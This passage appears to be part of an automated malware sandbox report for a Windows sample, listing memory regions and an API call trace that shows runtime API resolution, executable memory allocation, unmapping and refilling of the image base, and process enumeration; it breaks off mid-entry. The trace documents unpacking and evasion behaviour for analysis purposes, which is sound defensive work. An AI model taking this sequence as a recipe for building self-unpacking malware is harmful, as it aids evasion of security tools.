end_va = 0x75305fff entry_point = 0x75190000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3089 start_va = 0x76c70000 end_va = 0x76daffff entry_point = 0x76c70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3090 start_va = 0x76f20000 end_va = 0x76fddfff entry_point = 0x76f20000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3091 start_va = 0x772b0000 end_va = 0x772f2fff entry_point = 0x772b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3092 start_va = 0x77550000 end_va = 0x775cafff entry_point = 0x77550000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3093 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3094 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 3095 start_va = 0x610000 end_va = 0x623fff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 3096 start_va = 0x990000 end_va = 0x9a9fff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 3097 start_va = 0x400000 end_va = 0x419fff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3098 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3099 start_va = 0x9b0000 end_va = 0xaaffff entry_point = 0x0 region_type = private name = "private_0x00000000009b0000" filename = "" Region: id = 3100 start_va = 0x420000 end_va = 0x433fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 3101 start_va = 0x440000 end_va = 0x447fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 3102 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3103 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3104 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3105 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3106 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3107 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3108 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3109 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3110 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3111 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3112 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3113 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3114 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3115 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3116 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3117 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3118 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3119 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3120 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3121 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3122 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3123 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3124 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3125 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3126 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3127 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3128 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3129 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3130 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3131 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3132 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3133 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3134 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3135 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3136 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3137 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3138 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3139 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3140 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3141 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3142 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3143 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3144 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3145 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3146 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3147 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3148 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3149 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3150 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3151 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3152 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3153 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3154 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3155 start_va = 0x420000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3361 start_va = 0x75310000 end_va = 0x766cefff entry_point = 0x75310000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 3362 start_va = 0x76790000 end_va = 0x76c6cfff entry_point = 0x76790000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 3363 start_va = 0x77390000 end_va = 0x77549fff entry_point = 0x77390000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3364 start_va = 0x74da0000 end_va = 0x74de3fff entry_point = 0x74da0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3365 start_va = 0x74ab0000 end_va = 0x74abbfff entry_point = 0x74ab0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3366 start_va = 0x77300000 end_va = 0x7738cfff entry_point = 0x77300000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 3367 start_va = 0x77260000 end_va = 0x772a3fff entry_point = 0x77260000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 3368 start_va = 0x75180000 end_va = 0x7518efff entry_point = 0x75180000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 3369 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 3370 start_va = 0xab0000 end_va = 0xb1efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 3371 start_va = 0xb50000 end_va = 0xe86fff entry_point = 0xb50000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3376 start_va = 0x74880000 end_va = 0x749f4fff entry_point = 0x74880000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 3377 start_va = 0x77070000 end_va = 0x7707dfff entry_point = 0x77070000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 3378 start_va = 0x745f0000 end_va = 0x7474ffff entry_point = 0x745f0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 3379 start_va = 0x74320000 end_va = 0x745e0fff entry_point = 0x74320000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 3380 start_va = 0x74300000 end_va = 0x74318fff entry_point = 0x74300000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 3381 start_va = 0x740d0000 end_va = 0x742f3fff entry_point = 0x740d0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 3382 start_va = 0x430000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 3383 start_va = 0xe90000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 3384 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 3385 start_va = 0x740c0000 end_va = 0x740cefff entry_point = 0x740c0000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\SysWOW64\\wtsapi32.dll" (normalized: "c:\\windows\\syswow64\\wtsapi32.dll") Region: id = 3386 start_va = 0x740a0000 end_va = 0x740b2fff entry_point = 0x740a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3387 start_va = 0x74080000 end_va = 0x7409afff entry_point = 0x74080000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3388 start_va = 0x74050000 end_va = 0x7407efff entry_point = 0x74050000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3408 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 3409 start_va = 0x630000 end_va = 0x633fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 3410 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3411 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3412 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3413 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3414 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3415 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3416 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3417 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3418 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3419 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3420 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3421 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3422 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3423 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3424 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3425 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3426 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3427 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3428 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3429 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3430 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3431 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3432 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3433 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3434 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3435 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3436 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3437 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3438 start_va = 0x470000 end_va = 0x473fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3439 start_va = 0x770d0000 end_va = 0x77161fff entry_point = 0x770d0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3440 start_va = 0xf90000 end_va = 0x1078fff entry_point = 0xf90000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3441 start_va = 0x470000 end_va = 0x470fff entry_point = 0x470000 region_type = mapped_file name = "counters.dat" filename = "\\Windows\\SysWOW64\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\INetCache\\counters.dat" (normalized: "c:\\windows\\syswow64\\config\\systemprofile\\appdata\\local\\microsoft\\windows\\inetcache\\counters.dat") Region: id = 3442 start_va = 0x74d30000 end_va = 0x74d8bfff entry_point = 0x74d30000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3443 start_va = 0x770c0000 end_va = 0x770c6fff entry_point = 0x770c0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3444 start_va = 0x74030000 end_va = 0x74040fff entry_point = 0x74030000 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\SysWOW64\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll") Region: id = 3445 start_va = 0x74000000 end_va = 0x7402ffff entry_point = 0x74000000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3446 start_va = 0x73ff0000 end_va = 0x73ff7fff entry_point = 0x73ff0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3447 start_va = 0x73f40000 end_va = 0x73fe6fff entry_point = 0x73f40000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\SysWOW64\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll") Region: id = 3448 start_va = 0xab0000 end_va = 0xaeffff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 3449 start_va = 0xf90000 end_va = 0x108ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 3450 start_va = 0x73ef0000 end_va = 0x73f3dfff entry_point = 0x73ef0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\SysWOW64\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll") Region: id = 3451 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 3452 start_va = 0xaf0000 end_va = 0xb2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 3453 start_va = 0x1090000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x0000000001090000" filename = "" Region: id = 3454 start_va = 0x73e60000 end_va = 0x73ee3fff entry_point = 0x73e60000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\SysWOW64\\dnsapi.dll" (normalized: "c:\\windows\\syswow64\\dnsapi.dll") Region: id = 3455 start_va = 0x7feaa000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feaa000" filename = "" Region: id = 3456 start_va = 0x630000 end_va = 0x631fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 3457 start_va = 0x1190000 end_va = 0x11cffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 3458 start_va = 0x11d0000 end_va = 0x12cffff entry_point = 0x0 region_type = private name = "private_0x00000000011d0000" filename = "" Region: id = 3459 start_va = 0x73c50000 end_va = 0x73e58fff entry_point = 0x73c50000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10240.16384_none_3bccb1ff6bcd1849\\comctl32.dll") Region: id = 3460 start_va = 0x7fea7000 end_va = 0x7fea9fff entry_point = 0x0 region_type = private name = "private_0x000000007fea7000" filename = "" Thread: id = 446 os_tid = 0x98c [0143.439] GetProcAddress (hModule=0x74f40000, lpProcName="LoadLibraryExA") returned 0x74f59f60 [0143.439] LoadLibraryExA (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x74f40000 [0143.439] GetProcAddress (hModule=0x74f40000, lpProcName="mknjht34tfserdgfwGetProcAddress") returned 0x0 [0143.440] GetProcAddress (hModule=0x74f40000, lpProcName="GetProcAddress") returned 0x74f57940 [0143.440] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualAlloc") returned 0x74f58b70 [0143.440] GetProcAddress (hModule=0x74f40000, lpProcName="LoadLibraryExA") returned 0x74f59f60 [0143.440] GetProcAddress (hModule=0x74f40000, lpProcName="SetFilePointer") returned 0x74f66530 [0143.440] GetProcAddress (hModule=0x74f40000, lpProcName="lstrlenA") returned 0x74f63a30 [0143.440] GetProcAddress (hModule=0x74f40000, lpProcName="lstrcatA") returned 0x74f5efc0 [0143.440] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualProtect") returned 0x74f58c50 [0143.440] GetProcAddress (hModule=0x74f40000, lpProcName="UnmapViewOfFile") returned 0x74f594b0 [0143.440] GetProcAddress (hModule=0x74f40000, lpProcName="GetModuleHandleA") returned 0x74f59640 [0143.441] GetProcAddress (hModule=0x74f40000, lpProcName="WriteFile") returned 0x74f66590 [0143.441] GetProcAddress (hModule=0x74f40000, lpProcName="CloseHandle") returned 0x74f65f20 [0143.441] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualFree") returned 0x74f58c70 [0143.441] GetProcAddress (hModule=0x74f40000, lpProcName="GetTempPathA") returned 0x74f66410 [0143.441] GetProcAddress (hModule=0x74f40000, lpProcName="CreateFileA") returned 0x74f66170 [0143.441] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualAlloc") returned 0x74f58b70 [0143.441] VirtualAlloc (lpAddress=0x0, dwSize=0x13a00, flAllocationType=0x3000, flProtect=0x40) returned 0x610000 [0143.443] VirtualAlloc (lpAddress=0x0, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x990000 [0143.444] VirtualProtect (in: lpAddress=0x1000, dwSize=0xf744, flNewProtect=0x9088158b, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0143.444] VirtualProtect (in: lpAddress=0x11000, dwSize=0xb00, flNewProtect=0x8b7c0a40, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0143.445] VirtualProtect (in: lpAddress=0x12000, dwSize=0x6600, flNewProtect=0x4290880d, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0143.445] VirtualProtect (in: lpAddress=0x19000, dwSize=0x614, flNewProtect=0x8b7c0a40, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0143.445] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0143.446] VirtualAlloc (lpAddress=0x400000, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0143.450] GetCurrentProcessId () returned 0xc80 [0143.450] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xac [0143.460] Process32FirstW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.461] GetCurrentProcessId () returned 0xc80 [0143.461] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x67, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0143.462] GetCurrentProcessId () returned 0xc80 [0143.462] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0143.462] GetCurrentProcessId () returned 0xc80 [0143.462] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.463] GetCurrentProcessId () returned 0xc80 [0143.463] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0143.464] GetCurrentProcessId () returned 0xc80 [0143.464] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, 